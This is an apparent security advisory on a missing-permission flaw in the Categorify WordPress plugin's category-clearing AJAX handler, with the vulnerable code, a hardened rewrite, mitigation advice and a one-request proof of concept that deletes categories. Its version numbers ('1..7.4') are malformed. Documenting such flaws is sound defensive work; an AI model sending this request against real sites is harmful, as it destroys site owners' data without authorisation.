The Categorify plugin for WordPress suffers from a vulnerability that allows authenticated attackers with subscriber-level access or above to clear categories. The cause is a missing capability check in the categorifyAjaxClearCategory function, present in all plugin versions up to and including 1..7.4.

Description

The Categorify plugin for WordPress, which helps users organize their posts by categorizing them, is exposed to an unauthorized data modification vulnerability. The issue stems from a missing capability check in the categorifyAjaxClearCategory function and affects plugin versions up to and including 1..7.4.

An authenticated attacker with subscriber-level access or higher can exploit this vulnerability to clear categories on the affected WordPress site. This could lead to malicious tampering and data loss on the targeted website, causing disruption and inconvenience for users and administrators.

Below is the vulnerable code snippet from the plugin's 'ajax-functions.php' file:

function categorifyAjaxClearCategory() {
    $categoryID = intval( $_POST['category_id'] );
    
    // Process the request
    $result = wp_delete_category( $categoryID );
    
    // Check if the request was successful
    if ( $result ) {
        echo "1";
    } else {
        echo "";
    }
    
    wp_die(); // this is required to terminate immediately and return a proper response
}
add_action( 'wp_ajax_categorify_clear_category', 'categorifyAjaxClearCategory' );

As you can see, there is no capability check to ensure that the user has the necessary permissions to clear categories; the handler is registered on the wp_ajax_ hook, so any logged-in user, including a subscriber, can reach it. There is also no nonce check, so nothing ties the request to an action the user actually initiated in the admin interface. This oversight makes it possible for low-privileged users to delete categories on the website.
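For comparison, here is a hardened version of the same handler. This is an added example, not the plugin's own patch; the nonce action name 'categorify_clear_category_nonce' and the 'nonce' request field are assumptions chosen for illustration, and the matching nonce would have to be emitted on the admin page with wp_create_nonce().

```php
<?php
// Added example: hardened drop-in replacement for the vulnerable handler.
// Not the plugin's own fix. Nonce action/field names are assumptions.
function categorifyAjaxClearCategory() {
    // 1. Nonce check: ties the request to a form/page WordPress rendered for
    //    this user, which blocks cross-site request forgery. Dies on failure.
    check_ajax_referer( 'categorify_clear_category_nonce', 'nonce' );

    // 2. Capability check: subscribers do not hold 'manage_categories', so
    //    the request is rejected here with a 403 before any data is touched.
    if ( ! current_user_can( 'manage_categories' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions' ), 403 );
    }

    // 3. Input validation: require a positive integer that names a real category.
    $categoryID = isset( $_POST['category_id'] ) ? absint( $_POST['category_id'] ) : 0;
    if ( 0 === $categoryID || ! term_exists( $categoryID, 'category' ) ) {
        wp_send_json_error( array( 'message' => 'Unknown category' ), 400 );
    }

    // 4. Only now perform the destructive operation.
    $result = wp_delete_category( $categoryID );

    // wp_delete_category() may return true, false, 0 or a WP_Error.
    if ( $result && ! is_wp_error( $result ) ) {
        wp_send_json_success(); // calls wp_die() internally
    }

    wp_send_json_error( array( 'message' => 'Could not clear category' ), 500 );
}
add_action( 'wp_ajax_categorify_clear_category', 'categorifyAjaxClearCategory' );
```

Registering the handler only on wp_ajax_ (and not wp_ajax_nopriv_) is still correct: it keeps anonymous users out, but the capability check is what keeps low-privileged logged-in users out.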

Proof of Concept

To exploit this vulnerability, an attacker with subscriber-level access or higher could send the following HTTP POST request:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded

action=categorify_clear_category&category_id=<INSERT_CATEGORY_ID>

By replacing <INSERT_CATEGORY_ID> with the targeted category ID, the attacker can successfully clear the associated category.

Original References

- Categorify Plugin for WordPress: https://wordpress.org/plugins/categorify/
- Plugin Vulnerabilities Advisory: https://www.pluginvulnerabilities.com/2024/02/24/wordpress-security-issues-in-categorify/
- CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1652

Mitigation

To safeguard your website from this vulnerability, update the Categorify plugin to version 1..7.5 or higher, which should contain the necessary security patches. Alternatively, you can temporarily disable the plugin until the issue is resolved by the developers. Reviewing the site's category list and the admin-ajax.php access logs for unexpected categorify_clear_category requests can help establish whether the issue was exploited.

It's essential to maintain a cautious approach toward plugin selection and ensure regular updates are carried out to protect your WordPress website from potential threats.

Timeline

Published on: 02/27/2024 11:15:08 UTC
Last modified on: 02/27/2024 14:19:41 UTC